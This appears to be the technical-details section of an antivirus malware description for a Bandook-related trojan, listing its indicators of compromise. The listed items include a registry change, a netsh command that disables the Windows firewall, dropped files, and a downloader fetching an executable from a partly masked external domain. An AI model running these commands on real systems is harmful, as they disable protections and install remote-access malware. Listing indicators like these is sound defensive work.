Technical Information
- [<HKLM>\System\CurrentControlSet\Services\IKEEXT] 'Start' = '00000002'
- '%WINDIR%\syswow64\netsh.exe' firewall set opmode disable
- %LOCALAPPDATA%\iepv.exe
- %LOCALAPPDATA%\fget.exe
- %WINDIR%\temp\a00996.bat
- %TEMP%\bandook_merretich.exe
- %LOCALAPPDATA%\bandook_merretich.exe
- %WINDIR%\temp\a00996.bat
- %TEMP%\bandook_merretich.exe
- http://yo###rnet.de/wbblite/images/avatars/bandook_merretich.exe
- DNS ASK yo###rnet.de
- '%LOCALAPPDATA%\fget.exe' http://yo###rnet.de/wbblite/images/avatars/bandook_merretich.exe
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\Temp\a00996.bat" "<Full path to file>" "' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\Temp\a00996.bat" "<Full path to file>" "